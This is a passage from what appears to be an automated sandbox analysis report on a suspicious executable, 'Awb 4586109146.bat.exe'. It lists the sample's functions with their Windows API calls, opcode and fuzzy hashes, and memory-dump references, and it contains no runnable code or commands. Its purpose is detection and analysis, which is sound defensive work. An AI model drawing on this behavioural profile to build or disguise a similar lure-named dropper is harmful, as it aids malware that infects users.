Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: b4ed941283cc42cbc895d58b8121f3ae351412458d2bfbbd1978ef2183ef1513
Instruction ID: 2791961e855c801182d2f4b3e101f078c994d4f4985963d794b0561754721dd9
Opcode Fuzzy Hash: b4ed941283cc42cbc895d58b8121f3ae351412458d2bfbbd1978ef2183ef1513
Instruction Fuzzy Hash: E6F09632E045119BE704BBA49B8EABE72A89B44354F29403FFE42F71C1CAF85D41676D

Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00010444,?), ref: 00401587
ShowWindow.USER32(0001043E), ref: 0040159C

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 034276f51d0b42c553a83b344e0a7361816c93116213b78b32cfce19cc20a90a
Instruction ID: f806313cc2b23e457bf0aacbdd07ca6dd900f465a881214a0c79a18979c994cc
Opcode Fuzzy Hash: 034276f51d0b42c553a83b344e0a7361816c93116213b78b32cfce19cc20a90a
Instruction Fuzzy Hash: 67E08637B141049BCB15CFA4ED808AE77A6EB88321324047FE502B3290CA75BD40CF38

Function 00406694 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
GetProcAddress.KERNEL32(00000000,?), ref: 004066C1

Part of subcall function 00406624: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
Part of subcall function 00406624: wsprintfW.USER32 ref: 00406676
Part of subcall function 00406624: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction ID: 155b38c425e345f43688a0673e138072f65e923c2ca09dacbbabb210d44f0fbf
Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
Instruction Fuzzy Hash: 50E0863250461156D31197709E4487762EC9B95750307483EF946F2091DB399C36A66D

Function 00405DB0 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00406155 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
Instruction ID: 76b1046b3576aa71ae923c826af07df126468053c341a8b382c9c50c66927564
Opcode Fuzzy Hash: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
Instruction Fuzzy Hash: EFE0DF72700100EAE710DFA4DE48EAA33A8DF40368B30813AF611B60C0E6B4A9419B2D

Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4

Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8

Function 73962993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(7396505C,00000004,00000040,7396504C), ref: 739629B1

Memory Dump Source

Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true

Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d95a9308519089d6f0997c695cc7e08944cfb4c13a2b5af81a8ede1c1377cc20
Instruction ID: aab625b1aafeca71a5f7f4071ed121f699fb602ffaf5dc38b25d025da8de6fe7
Opcode Fuzzy Hash: d95a9308519089d6f0997c695cc7e08944cfb4c13a2b5af81a8ede1c1377cc20
Instruction Fuzzy Hash: 20F092F250AA81FEC350EF2A86447193BE0B749204B64453EE19CDE241E334C448CF92

Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745

Function 00406127 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Call,?), ref: 0040614B

Memory Dump Source

Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
